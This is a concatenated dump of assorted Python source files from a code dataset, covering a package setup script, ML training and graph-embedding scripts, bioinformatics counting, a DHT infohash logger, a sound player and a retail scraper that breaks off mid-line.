find_packages\n\ndata_files = []\n\nfor dir, dirs, files in os.walk('templates'):\n data_files.append((os.path.join('couchapp', dir), \n [os.path.join(dir, file_) for file_ in files]))\n\nfor dir, dirs, files in os.walk('vendor'):\n data_files.append((os.path.join('couchapp', dir), \n [os.path.join(dir, file_) for file_ in files]))\n \n\nsetup(\n name = 'Couchapp',\n version = '0.3.4',\n url = 'http://github.com/couchapp/couchapp/tree/master',\n license = 'Apache License 2',\n author = 'Benoit Chesneau',\n author_email = 'benoitc@e-engura.org',\n description = 'Standalone CouchDB Application Development Made Simple.',\n long_description = \"\"\"CouchApp is a set of helpers and a jQuery plugin\n that conspire to get you up and running on CouchDB quickly and\n correctly. It brings clarity and order to the freedom of CouchDB's\n document-based approach.\"\"\",\n keywords = 'couchdb couchapp',\n platforms = ['any'],\n\n zip_safe = False,\n\n packages=find_packages('src'),\n package_dir={\n '': 'src'\n },\n data_files = data_files,\n include_package_data = True,\n entry_points = {\n 'console_scripts': [\n 'couchapp = couchapp.bin.couchapp_cli:main',\n ]\n },\n classifiers = [\n 'License :: OSI Approved :: Apache Software License',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Development Status :: 4 - Beta',\n 'Programming Language :: Python',\n 'Operating System :: OS Independent',\n 'Topic :: Database',\n 'Topic :: Utilities',\n ],\n test_suite='tests',\n\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"312215559","text":"import os \nimport numpy as np \nimport tensorflow as tf \nimport input_data \nimport model \nimport matplotlib.pyplot as PLT\n#变量声明 \nN_CLASSES = 4\nIMG_W = 100 # resize图像,太大的话训练时间久 \nIMG_H = 100 \nBATCH_SIZE =32 \nCAPACITY = 200 \nMAX_STEP = 1000 # 一般大于10K \nlearning_rate = 0.00001 # 一般小于0.0001 \npath=os.path.abspath('.')\n#获取批次batch \ntrain_dir = path+ '/pic' #训练样本的读入路径 \nlogs_train_dir = path+'/logs' #logs存储路径 \n\ntrain, train_label, val, val_label = input_data.get_files(train_dir, 0.001) \n#训练数据及标签 \ntrain_batch,train_label_batch = input_data.get_batch(train, train_label, IMG_W, IMG_H, BATCH_SIZE, CAPACITY) \n#print(train_label_batch) #Tensor(\"Reshape_7:0\", shape=(30,), dtype=int32)\n#print(train_batch) #Tensor(\"batch_9:0\", shape=(30, 64, 64, 3), dtype=float32)\n#测试数据及标签 \nval_batch, val_label_batch = input_data.get_batch(val, val_label, IMG_W, IMG_H, BATCH_SIZE, CAPACITY) \n \n#训练操作定义 \ntrain_logits = model.inference(train_batch, BATCH_SIZE, N_CLASSES) #inference返回的是一个softmax——linear\n#print (train_logits) ##Tensor(\"softmax_linear_4/softmax_linear_1:0\", shape=(30, 2), dtype=float32)\ntrain_loss = model.losses(train_logits, train_label_batch) # \ntrain_op = model.trainning(train_loss, learning_rate) \ntrain_acc = model.evaluation(train_logits, train_label_batch) #train loss \\train op\\train acc 是要在sess.run里边进行运行的 \n \n#测试操作定义 \n#test_logits = model.inference(val_batch, BATCH_SIZE, N_CLASSES) #这样会定义新的一幅图 \n#test_loss = model.losses(test_logits, val_label_batch) \n#test_acc = model.evaluation(test_logits, val_label_batch) \n \n#这个是log汇总记录 \nsummary_op = tf.summary.merge_all() \n \n#产生一个会话 \nsess = tf.Session() \n#产生一个writer来写log文件 \ntrain_writer = tf.summary.FileWriter(logs_train_dir, sess.graph) #tensorboard能查看吗? \n#val_writer = tf.summary.FileWriter(logs_test_dir, sess.graph) \n#产生一个saver来存储训练好的模型 \nsaver = tf.train.Saver() \n#所有节点初始化\nsess.run(tf.global_variables_initializer()) \n#队列监控 \ncoord = tf.train.Coordinator() \nthreads = tf.train.start_queue_runners(sess=sess, coord=coord) \nlist_loss = []\nlist_acc = []\nlist_step = []\n#进行batch的训练 \ntry: \n #执行MAX_STEP步的训练,一步一个batch \n for step in np.arange(MAX_STEP): #100\n if coord.should_stop(): #关于多线程停止的一个类\n break \n #启动以下操作节点,有个疑问,为什么train_logits在这里没有开启? 因为train_logits在train_loss里面开启了\n _, tra_loss, tra_acc = sess.run([train_op, train_loss, train_acc]) \n \n #每10步打印一次当前的loss以及acc,同时记录log,写入writer \n if step % 100 == 0: \n print('Step %d, train loss = %.2f, train accuracy = %.2f%%' %(step, tra_loss, tra_acc*100.0)) \n list_loss.append(tra_loss)\n list_acc.append(tra_acc*100)\n list_step.append(step/10)\n PLT.plot(list_step,list_acc)\n PLT.plot(list_step,list_loss)\n summary_str = sess.run(summary_op) \n train_writer.add_summary(summary_str, step) \n #保存一次训练好的模型 \n if (step + 1) == MAX_STEP:\n print(\"saving ...\")\n checkpoint_path = os.path.join(logs_train_dir, 'model.ckpt') \n saver.save(sess, checkpoint_path, global_step=step) \n constant_graph = tf.graph_util.convert_variables_to_constants(sess, sess.graph_def, [\"softmax_linear/softmax_linear_1\"])\n with tf.gfile.FastGFile(\"zxf.pb\", mode='wb') as f:\n f.write(constant_graph.SerializeToString())\n print(\"saving pb ...\")\n print(list_loss)\n print(list_acc)\n print(list_step)\n###异常处理 \nexcept tf.errors.OutOfRangeError: \n print('Done training -- epoch limit reached') \n \nfinally: \n coord.request_stop() ","sub_path":"新建文件夹/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"239946556","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport gc\nimport argparse\nimport dace\nimport numpy as np\nimport dace.frontend.common as np_frontend\n\nimport os\nfrom timeit import default_timer as timer\n\nSDFG = dace.sdfg.SDFG\n\nM = dace.symbol('M')\nN = dace.symbol('N')\nK = dace.symbol('K')\nL = dace.symbol('L')\n\nA = dace.ndarray([L, K, M, N], dtype=dace.float64)\nB = dace.ndarray([L, N, M], dtype=dace.float64)\n\nif __name__ == \"__main__\":\n print(\"==== Program start ====\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"M\", type=int, nargs=\"?\", default=128)\n parser.add_argument(\"N\", type=int, nargs=\"?\", default=128)\n parser.add_argument(\"L\", type=int, nargs=\"?\", default=5)\n parser.add_argument(\"K\", type=int, nargs=\"?\", default=10)\n args = vars(parser.parse_args())\n\n M.set(args[\"M\"])\n N.set(args[\"N\"])\n K.set(args[\"K\"])\n L.set(args[\"L\"])\n\n print('Matrix transpose %dx%dx' % (M.get(), N.get()))\n\n # Initialize arrays: Randomize A and B\n A[:] = np.random.rand(L.get(), K.get(), M.get(),\n N.get()).astype(dace.float64.type)\n B[:] = np.random.rand(L.get(), N.get(), M.get()).astype(dace.float64.type)\n\n A_regression = np.ndarray(\n [L.get(), K.get(), M.get(), N.get()], dtype=np.float64)\n B_regression = np.ndarray([L.get(), N.get(), M.get()], dtype=np.float64)\n A_regression[:] = A[:]\n B_regression[:] = B[:]\n\n mtr = SDFG(name='mtr')\n mtr.add_node(\n np_frontend.op_impl.matrix_transpose_s('A',\n A.shape,\n dace.float64,\n False,\n 'B',\n B.shape,\n dace.float64,\n A_index=[2, 3],\n B_index=[4],\n label='mtr'))\n\n mtr(A=A, B=B)\n B_regression[4] = np.transpose(A_regression[2, 3])\n\n rel_error = (np.linalg.norm((B_regression - B).flatten(), ord=2) /\n np.linalg.norm(B_regression.flatten(), ord=2))\n print(\"Relative error:\", rel_error)\n print(\"==== Program end ====\")\n exit(0 if rel_error <= 1e-15 else 1)\n","sub_path":"tests/numpy/matrix_transpose_s.py","file_name":"matrix_transpose_s.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"632452331","text":"import os\nfrom glob import glob\nfrom tqdm.auto import tqdm\nimport numpy as np\nfrom ensmallen_graph import EnsmallenGraph\nfrom embiggen import GraphTransformer, EdgeTransformer\n\n#try:\n# from tsnecuda import TSNE\n#except ModuleNotFoundError:\nfrom MulticoreTSNE import MulticoreTSNE as TSNE\n\nembedding_path = \"./FOURTH/SkipGram_embedding.npy\"\n\ngraph = EnsmallenGraph.from_csv(\n edge_path=\"/global/scratch/marcin/N2V/MicrobeEnvironmentGraphLearn/ENIGMA_data/masterG.edgelist_col12_head.tsv\",\n sources_column=\"subject\",\n destinations_column=\"object\",\n directed=False\n)\n\n\nnegative_graph = graph.sample_negatives(42, graph.get_edges_number(), False)\n\nembedding = np.load(embedding_path)\n\nfor method in tqdm(EdgeTransformer.methods, desc=\"Methods\", leave=False):\n tsne_path = f\"tsne_edges_microbeenv\"\n if os.path.exists(tsne_path):\n continue\n transformer = GraphTransformer(method)\n transformer.fit(embedding)\n positive_edges = transformer.transform(graph)\n negative_edges = transformer.transform(negative_graph)\n edges = np.vstack([positive_edges, negative_edges])\n nodes = np.concatenate([\n np.ones(positive_edges.shape[0]),\n np.zeros(negative_edges.shape[0])\n ])\n indices = np.arange(0, nodes.size)\n np.random.shuffle(indices)\n edges = edges[indices]\n nodes = nodes[indices]\n np.save(f\"tsne_edges_microbeenv_labels\", nodes)\n tsne = TSNE(verbose=True)\n np.save(\n tsne_path,\n tsne.fit_transform(edges)\n )","sub_path":"notebooks/TSNE_edge_types_visualization_microbeenv.py","file_name":"TSNE_edge_types_visualization_microbeenv.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"338030849","text":"#encoding: utf-8\r\nfrom kademlia.kdht import Server\r\nfrom kademlia.ktable import KTable\r\nfrom kademlia.utils import random_id\r\n\r\nclass Master(object):\r\n def __init__(self, f):\r\n self.f = f\r\n\r\n def log(self, infohash):\r\n self.f.write(infohash.encode(\"hex\")+\"\\n\")\r\n self.f.flush()\r\n \r\ntry:\r\n f = open(\"infohash.log\", \"a\")\r\n\r\n k = KTable(random_id())\r\n m = Master(f)\r\n\r\n s = Server(k, m)\r\n s.start() \r\nexcept KeyboardInterrupt:\r\n s.socket.close()","sub_path":"simDHT.py","file_name":"simDHT.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"59291600","text":"import pygame\nimport time\nimport random\n#note that there is a pygame music function\n# but this only allows single channel (because it is streamed)\n# it is possible to play music files over sound files\n#this implyes that sound is played from ram so needs to\n#consider file size of all file to be played\n# files can be replayed\n\n#pygame.init()\npygame.mixer.init()\n#######################################\ncount = pygame.mixer.Sound(\"file1.wav\")\nmusic = pygame.mixer.Sound(\"dogyInWindow.wav\")\n\n#!/usr/bin/env python\n\nimport RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\nreader = SimpleMFRC522()\n\n#plays multiple files when read, simultaneously\n##can use count as delay, or delay, or if last !< current, etc\nwhile True:\n id, text = reader.read()\n \n if id == (576445216648):\n print ('Tag 1 Found')\n pygame.mixer.Sound.play(count)\n time.sleep(2)\n continue\n \n elif id == (561186360885):\n print ('Tag 2 Found')\n pygame.mixer.Sound.play(music)\n time.sleep(2)\n continue\n \n elif id == (427164244981):\n print ('Tag 3 Found')\n time.sleep(2)\n pygame.mixerfadeout\n \n \n## elif id == ():\n# print ('Tag 4 Stick Found')\n# pygame.mixer.Sound.play(music)\n # time.sleep(2)\n # continue\n \n####################################\n#pygame.mixer.music.load(\"dogyInWindow.wav\")\n#pygame.mixer.music.play(2)\n#pygame.mixer.music.load(\"file1.wav\")\n#pygame.mixer.music.play(2)\n\n\nGPIO.cleanup()\n","sub_path":"RaspberryPi_ToyFiles/MultiSoundTest.py","file_name":"MultiSoundTest.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"581845602","text":"battery_status = {\n '1' : 'Unknown',\n '2' : 'Normal',\n '3' : 'Low',\n '4' : 'Depleted'\n}\n\nbattery_abm_status = {\n '0' : 'Unknown',\n '1' : 'Charging',\n '2' : 'Discharging',\n '3' : 'Floating',\n '4' : 'Resting',\n '5' : 'Unknown',\n '6' : 'Disconnected',\n '7' : 'Under Test',\n '8' : 'Check Battery',\n}\n\nbattery_failure = {\n '1' : 'Yes',\n '2' : 'No'\n}\n\nbattery_not_present = {\n '1' : 'yes',\n '2' : 'No'\n}\n\nbattery_low_capacity = {\n '1' : 'yes',\n '2' : 'No'\n}\n\nbattery_test_status = {\n '1' : 'Unknown',\n '2' : 'Passed',\n '3' : 'Failed',\n '4' : 'In Progress',\n '5' : 'Not Supported',\n '6' : 'Inhibited',\n '7' : 'Scheduled',\n}\n\noutput_source = {\n '1' : 'Other',\n '2' : 'None',\n '3' : 'Normal',\n '4' : 'Bypass',\n '5' : 'Battery',\n '6' : 'Booster',\n '7' : 'Reducer',\n '8' : 'Parallel Capacity',\n '9' : 'Parallel Redundant',\n '10' : 'High Efficiency Mode',\n '11' : 'Maintenance Bypass',\n '12' : 'ESS Mode',\n}\n\ntest_results = {\n '1' : 'Done Pass',\n '2' : 'Done Warning',\n '3' : 'Done Error',\n '4' : 'Aborted',\n '5' : 'In Progress',\n '6' : 'No Tests Initiated',\n}\n\ninput_ids = {\n '1' : 'phase1toN',\n '2' : 'phase2toN',\n '3' : 'phase3toN',\n '4' : 'phase1to2',\n '5' : 'phase2to3',\n '6' : 'phase3to1'\n}\n\ninput_names = {\n '1' : 'L1/A',\n '2' : 'L2/B',\n '3' : 'L3/C',\n '4' : 'L1-L2/A-B',\n '5' : 'L2-L3/B-C',\n '6' : 'L3-L1/C-A'\n}\n\nconfig_audible_alarm = {\n '1' : 'Disabled',\n '2' : 'Enabled',\n '3' : 'Muted'\n}","sub_path":"backend/mm_ups_rt/src/mibs.py","file_name":"mibs.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10291368","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\nli = []\nfor _ in range(n):\n word = input().rstrip()\n word_count = len(word)\n li.append((word, word_count))\n\n# 중복 삭제\nli = list(set(li))\n\n# 단어 숫자 정렬 > 단어 알파벳 정렬\nli.sort(key = lambda word: (word[1], word[0]))\n\nfor i in li:\n print(i[0])","sub_path":"doyeon/BOJ/★정렬/20210401_boj_1181_단어 정렬.py","file_name":"20210401_boj_1181_단어 정렬.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"202198132","text":"import sys\nimport os\nimport re\nfrom collections import defaultdict\n\t\t\nsample_dict = defaultdict(list)\n\n# read in files from the command line\nINPUT_FILE_NAME = r'KW-\\d+_HTSeq\\.txt' # regex for file name\nSAMPLE_NAME = r'KW-\\d+' # regex for sample namec\n\noutput_file_name = \"HTSeq_count_file_new.txt\"\nheader = [\"sample_ID\", \"> 10\", \">20\", \"ERCC >10\", \"ERCC > 20\"]\ndata_file_directory, date = sys.argv[1:]\n\n# read each file from the directory\nfor file_name in os.listdir(data_file_directory):\n\n\t# only read files with the format of the sorted bam file\n\tif re.match(INPUT_FILE_NAME, file_name):\n\t\tprint(file_name)\n\t\tten_count = 0\n\t\ttwenty_count = 0\n\t\tERCC_ten_count = 0\n\t\tERCC_twenty_count = 0\n\n\t\t# rename the complete filepath to include the name of the file\n\t\tfile_path = os.path.join(data_file_directory, file_name)\n\n\t\t# # name the input file\n\t\ttxt_input = file_path\n\n\t\t# name the sample based on the file name\n\t\tsample_name = ''.join(re.findall(SAMPLE_NAME, file_name)) + \"_\" + date\n\n\t\twith open(file_path, \"r\") as HTSeq_file:\n\t\t\tfor line in HTSeq_file:\n\t\t\t\tline = line.strip().split('\\t')\n\n\t\t\t\tif int(line[1]) >= 10 and \"ERCC\" not in line[0]:\n\t\t\t\t\tten_count += 1\n\n\t\t\t\tif int(line[1]) >= 20 and \"ERCC\" not in line[0]:\n\t\t\t\t\ttwenty_count += 1\n\n\t\t\t\tif int(line[1]) >= 10 and \"ERCC\" in line[0]:\n\t\t\t\t\tERCC_ten_count += 1\n\n\t\t\t\tif int(line[1]) >= 20 and \"ERCC\" in line[0]:\n\t\t\t\t\tERCC_twenty_count += 1\n\n\t\tcount_list = [str(ten_count), str(twenty_count), str(ERCC_ten_count), str(ERCC_twenty_count)]\n\n\t\tsample_dict[sample_name].extend(count_list)\t\t\n\nwith open(output_file_name, 'w') as output_file:\n\toutput_file.write('\\t'.join(header) + '\\n')\n\tfor item in sample_dict:\n\t\toutput_file.write(item + '\\t' + '\\t'.join(sample_dict[item]) + '\\n')\n\n\n","sub_path":"HTSeq_analysis_multiple_new.py","file_name":"HTSeq_analysis_multiple_new.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"374583870","text":"# -*- coding: utf-8 -*-\n\"\"\"Shim providing notebook.nbextensions stuff from 4.2 for earlier versions.\"\"\"\n\ntry:\n from notebook.nbextensions import (\n GREEN_OK, RED_X, BaseNBExtensionApp, _get_config_dir,\n )\nexcept ImportError:\n from ._compat.nbextensions import (\n GREEN_OK, RED_X, BaseNBExtensionApp, _get_config_dir,\n )\n\n__all__ = [\n 'GREEN_OK', 'RED_X', 'BaseNBExtensionApp', '_get_config_dir',\n]\n","sub_path":"src/jupyter_nbextensions_configurator/notebook_compat/nbextensions.py","file_name":"nbextensions.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"403408340","text":"class Sbc:\n \"\"\"Read and parse the SBC world file.\"\"\"\n\n def __init__(self, sbc_filename):\n \"\"\"Init for SBC reading and parsing.\"\"\"\n\n import xml.etree.ElementTree as ET\n self.factions = {}\n self.playerDict = {}\n self.world = {}\n self.mods = {}\n\n tree = ET.parse(sbc_filename)\n root = tree.getroot()\n\n # app_version = root.find('AppVersion').text\n\n settings = {}\n for setting in root.find('Settings'):\n settings[setting.tag] = setting.text\n #TODO: work with BlockTypeLimits dictionary\n self.world['settings'] = settings\n self.world['appVersion'] = root.find('AppVersion').text\n self.world['sessionName'] = root.find('SessionName').text\n self.world['lastSaveTime'] = root.find('LastSaveTime').text\n self.world['description'] = root.find('Description').text\n self.world['elapsedGameTime'] = root.find('ElapsedGameTime').text\n\n mods = root.find('Mods')\n for eachMod in mods.iter('ModItem'):\n mod_id = eachMod.find('PublishedFileId').text\n self.mods[mod_id] = {}\n mod_friendly_name = eachMod.attrib['FriendlyName']\n\n self.mods[mod_id]['url'] = 'http://steamcommunity.com/sharedfiles/filedetails/?id=' + mod_id\n self.mods[mod_id]['friendly_name'] = mod_friendly_name\n\n self.thisPlayerDict = {}\n playerToolbarSlotCount = 0\n playerConnected = \"false\"\n\n for players in root.iter('Identities'):\n for eachPlayer in players.iter('MyObjectBuilder_Identity'):\n # loginTime=\"\" # TODO: these come from log parser class\n # logoutTime=\"\"\n displayName = eachPlayer.find('DisplayName').text\n steamID = eachPlayer.find('CharacterEntityId').text\n inGameID = eachPlayer.find('IdentityId').text\n last_login_time = eachPlayer.find('LastLoginTime').text\n last_logout_time = eachPlayer.find('LastLogoutTime').text\n if eachPlayer.find('Model') is not None:\n model = eachPlayer.find('Model').text\n else:\n model = None\n\n for playersData in root.findall(\"./AllPlayersData/dictionary/item\"):\n playerDataClientID = playersData.find('./Key/ClientId').text\n playerDataIdentityID = playersData.find('./Value/IdentityId').text\n\n if playerDataIdentityID == inGameID:\n playerConnected = playersData.find('./Value/Connected').text\n playerToolbarSlotCount = len(playersData.findall('./Value/Toolbar/Slots/Slot'))\n\n self.thisPlayerDict[\"username\"] = displayName\n self.thisPlayerDict[\"inGameID\"] = inGameID\n self.thisPlayerDict[\"steamID\"] = steamID\n self.thisPlayerDict[\"model\"] = model\n self.thisPlayerDict[\"playerDataClientID\"] = playerDataClientID\n self.thisPlayerDict[\"playerConnected\"] = playerConnected\n self.thisPlayerDict[\"playerToolbarSlotCount\"] = str(playerToolbarSlotCount)\n self.thisPlayerDict[\"lastLoginTime\"] = last_login_time\n self.thisPlayerDict[\"lastLogoutTime\"] = last_logout_time\n # thisPlayerDict{\"firstSeen\"}, today)\n # self.thisPlayerDict[\"loginTime\"] = loginTime # TODO: these come from log parser class\n # self.thisPlayerDict[\"logoutTime\"] = logoutTime\n # self.thisPlayerDict[\"foundKnownUser\"] = foundKnownUser ## if he isn't in users.xml, he's new\n\n self.playerDict[inGameID] = self.thisPlayerDict\n\n del self.thisPlayerDict\n self.thisPlayerDict = {}\n\n # faction = {}\n for eachFaction in root.iter('MyObjectBuilder_Faction'):\n faction = {}\n factionID = eachFaction.find('FactionId')\n tag = eachFaction.find('Tag')\n name = eachFaction.find('Name')\n description = eachFaction.find('Description')\n factionSize = len(eachFaction.find('Members'))\n\n faction['factionId'] = factionID.text\n faction['tag'] = tag.text\n faction['name'] = name.text\n if hasattr(description, 'text'):\n faction['description'] = description.text\n faction['size'] = factionSize\n\n memberList = {}\n for member in eachFaction.iter('MyObjectBuilder_FactionMember'):\n memberPlayerID = member.find('PlayerId')\n memberIsLeader = member.find('IsLeader')\n memberIsFounder = member.find('IsFounder')\n memberList['playerId'] = memberPlayerID.text\n memberList['isLeader'] = memberIsLeader.text\n memberList['IsFounder'] = memberIsFounder.text\n faction['memberList'] = memberList\n self.factions[factionID.text] = faction\n del faction\n\n # end def __init__ for sbc\n\n def getPlayerDict(self):\n return self.playerDict\n\n def get_world_users(self):\n return self.playerDict\n\n def get_world(self):\n return self.world\n\n def getSettings(self):\n return self.settings\n\n def get_mods(self):\n return self.mods\n","sub_path":"Sbc.py","file_name":"Sbc.py","file_ext":"py","file_size_in_byte":5365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"417631280","text":"\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport collections\n\nfrom dopamine.agents.dqn.dqn import DQNAgent\n\n\ndef huber(x, k=1.0):\n return torch.where(x.abs() < k, 0.5 * x.pow(2), k * (x.abs() - 0.5 * k))\n\ndef get_network_type():\n \"\"\"Returns the type of the outputs of a Q value network.\n\n Returns:\n net_type: the outputs of the network.\n \"\"\"\n return collections.namedtuple('DQN_network', ['q_values', 'logits'])\n\n\nclass NetWork(nn.Module):\n\n def __init__(self, len_state, num_quant, num_actions):\n nn.Module.__init__(self)\n\n self.num_quant = num_quant\n self.num_actions = num_actions\n\n self.layer1 = nn.Linear(len_state, 256)\n self.layer2 = nn.Linear(256, num_actions * num_quant)\n\n def forward(self, x):\n x = self.layer1(x)\n x = torch.tanh(x)\n x = self.layer2(x)\n logits = x.view(-1, self.num_actions, self.num_quant)\n return get_network_type()(logits.mean(2), logits)\n\n\nclass QuantileRegAgent(DQNAgent):\n \"\"\"An implementation fo the Quantile Regression DQN agent\"\"\"\n\n def __init__(self,\n num_actions,\n len_state,\n num_quant=2,\n net=NetWork,\n gamma=0.99,\n memory_size=10000,\n batch_size=32,\n learning_start=1000,\n update_period=1,\n target_update_period=500,\n epsilon_start=1.0,\n epsilon_train_final=0.01,\n epsilon_decay_period=10000,\n torch_device='cpu'):\n\n \"\"\"Initializes the agent.\n\n Args:\n num_actions: int, number of actions the agent can take at any state.\n len_state: int, the size of the state.\n net: define your net work model.\n gamma: float, discount factor with the usual RL meaning.\n memory_size: int, the capacity of the replay buffer.\n batch_size: int, the number you want to sample from replay buffer every \n train step\n learning_start: int, number of transitions that should be experienced\n before the agent begins training its value function.\n update_period: int, period between DQN updates.\n target_update_period: int, update period for the target network.\n epsilon_train: float, the value to which the agent's epsilon is eventually\n decayed during training.\n epsilon_decay_period: int, length of the epsilon decay schedule.\n torch_device: str, Tensorflow device on which the agent's graph is executed.\n \"\"\"\n self._num_quant = num_quant\n self._tau = torch.Tensor((2 * np.arange(num_quant) + 1) / (2.0 * num_quant)).view(1, -1)\n\n super(QuantileRegAgent, self).__init__(\n num_actions=num_actions,\n len_state=len_state,\n net=net,\n gamma=gamma,\n memory_size=memory_size,\n batch_size=batch_size,\n learning_start=learning_start,\n update_period=update_period,\n target_update_period=target_update_period,\n epsilon_start=epsilon_start,\n epsilon_train_final=epsilon_train_final,\n epsilon_decay_period=epsilon_decay_period,\n torch_device=torch_device\n )\n\n\n def _build_net(self):\n \"\"\"Builds the Q-value network computations needed for acting and training.\"\"\"\n self._net = self._network(self._len_state, self._num_quant, self._num_actions).to(self._device)\n self._target_net = self._network(self._len_state, self._num_quant, self._num_actions).to(self._device)\n\n def _update_net(self, batch):\n \"\"\"Perform one step training from replay buffer and update net's params\"\"\"\n s_batch, a_batch, r_batch, s2_batch, t_batch = batch\n s_batch = torch.stack(s_batch)\n s2_batch = torch.stack(s2_batch)\n a_batch = torch.cat(a_batch)\n r_batch = torch.cat(r_batch).view(-1, 1)\n t_batch = torch.cat(t_batch).view(-1, 1)\n\n s_batch = s_batch.type(dtype=torch.float32)\n s2_batch = s2_batch.type(dtype=torch.float32)\n a_batch = a_batch.type(dtype=torch.long)\n t_batch = t_batch.type(dtype=torch.float32)\n\n theta = self._net(s_batch).logits[np.arange(self._batch_size), a_batch]\n next_logits = self._target_net(s2_batch).logits.detach()\n theta_next = next_logits[np.arange(self._batch_size), next_logits.mean(2).max(1)[1]]\n theta_target = self._gamma * theta_next * (1 - t_batch) + r_batch\n\n diff = theta_target.t().unsqueeze(-1) - theta\n loss = huber(diff) * (self._tau - (diff.detach() < 0).float()).abs()\n loss = loss.mean()\n\n self._optimizer.zero_grad()\n\n loss.backward()\n for param in self._net.parameters():\n param.grad.data.clamp_(-1, 1)\n self._optimizer.step()\n\n\n","sub_path":"dopamine/agents/dqn/quantile_reg_dqn.py","file_name":"quantile_reg_dqn.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"382597000","text":"import os\nimport os.path as op\nimport re\n\nfrom lxml import etree\n\nparser = etree.HTMLParser(encoding='utf-8')\nfrom time import sleep\nfrom urllib.parse import urlsplit, parse_qs\nimport requests_cache\n\nfrom validators import validate_raw_files, check_products_detection\nfrom create_csvs import create_csvs\nfrom ers import all_keywords_usa as keywords, fpath_namer, mh_brands, clean_url, shop_inventory_lw_csv\n\nfrom matcher import BrandMatcher\nfrom ers import COLLECTION_DATE, file_hash, img_path_namer, TEST_PAGES_FOLDER_PATH\nfrom custom_browser import CustomDriver\nfrom parse import parse\nfrom ers import clean_xpathd_text\n\n\n# Init variables and assets\nshop_id = 'delivery_com'\nroot_url = 'https://www.delivery.com'\nrequests_cache.install_cache(fpath_namer(shop_id, 'requests_cache'))\ncountry = 'USA'\n\nsearches, categories, products = {}, {}, {}\ndriver = CustomDriver(headless=True)\nbrm = BrandMatcher()\n\n\ndef getprice(pricestr):\n pricestr = re.sub(\"[^0-9.$]\", \"\", pricestr)\n if pricestr == '':\n return pricestr\n price = parse('${pound:d}.{pence:d}', pricestr)\n if price is None:\n price = parse('{pence:d}p', pricestr)\n return price.named['pence']\n else:\n return price.named['pound'] * 100 + price.named['pence']\n\n\n# ##################\n# # CTG page xpathing #\n# ##################\nctg_page_test_url = 'https://www.delivery.com/search/alcohol/wine/red?address=NEW%20YORK,%20NY'\nexple_ctg_page_path = op.join(TEST_PAGES_FOLDER_PATH, shop_id, 'ctg_page_test.html') # TODO : store the file\nos.makedirs(op.dirname(exple_ctg_page_path), exist_ok=True)\nctg, test_categories, test_products = '', {'': []}, {}\n\n# driver.get(ctg_page_test_url)\n# driver.save_page(exple_ctg_page_path, scroll_to_bottom=True)\n\n\ndef ctg_parsing(fpath, ctg, categories, products): # TODO : modify xpaths\n tree = etree.parse(open(fpath, 'rb'), parser=parser)\n for li in tree.xpath('//ul[contains(@id ,\"product_list\")]/li'):\n if not li.xpath('.//a/@href'):\n continue\n produrl = li.xpath('.//a/@href')[0]\n produrl = parse_qs(urlsplit(produrl).query)['url'][0] if 'url' in parse_qs(urlsplit(produrl).query) else produrl\n products[produrl] = {\n 'pdct_name_on_eretailer': clean_xpathd_text(li.xpath('.//a[@class=\"product-name\"]/text()')),\n 'volume': clean_xpathd_text(li.xpath('.//p[@class=\"product-desc\"]/text()')),\n 'raw_price': clean_xpathd_text(li.xpath('.//div[@class=\"alineacion\"]//text()')[:2]),\n 'raw_promo_price': clean_xpathd_text(li.xpath('./zzzzzzzzzzzz')),\n 'pdct_img_main_url': \"\".join(li.xpath('.//div[@class=\"product-image-container\"]//img/@src')),\n }\n products[produrl]['brnd'] = brm.find_brand(products[produrl]['pdct_name_on_eretailer'])['brand']\n print(products[produrl], produrl)\n products[produrl]['price'] = getprice(products[produrl]['raw_price'])\n products[produrl]['promo_price'] = getprice(products[produrl]['raw_promo_price'])\n products[produrl]['pdct_img_main_url'] = clean_url(products[produrl]['pdct_img_main_url'], root_url)\n print(products[produrl])\n\n categories[ctg].append(produrl)\n return categories, products\n\n\nctg_parsing(exple_ctg_page_path, ctg, test_categories, test_products)\n\n###################\n# # KW page xpathing #\n###################\nsearch_page_test_url = 'https://www.delivery.com/search/alcohol?address=NEW%20YORK,%20NY&keyword=whiskey'\nexple_kw_page_path = op.join(TEST_PAGES_FOLDER_PATH, shop_id, 'kw_page_test.html') # TODO : store the file\nos.makedirs(op.dirname(exple_ctg_page_path), exist_ok=True)\nkw_test, test_searches, test_products = 'champagne', {\"champagne\": []}, {}\n\n# driver.get(search_page_test_url.format(kw=kw_test))\n# driver.save_page(exple_kw_page_path, scroll_to_bottom=True)\n\n\ndef kw_parsing(fpath, kw, searches, products): # TODO : modify xpaths\n tree = etree.parse(open(fpath, 'rb'), parser=parser)\n for li in 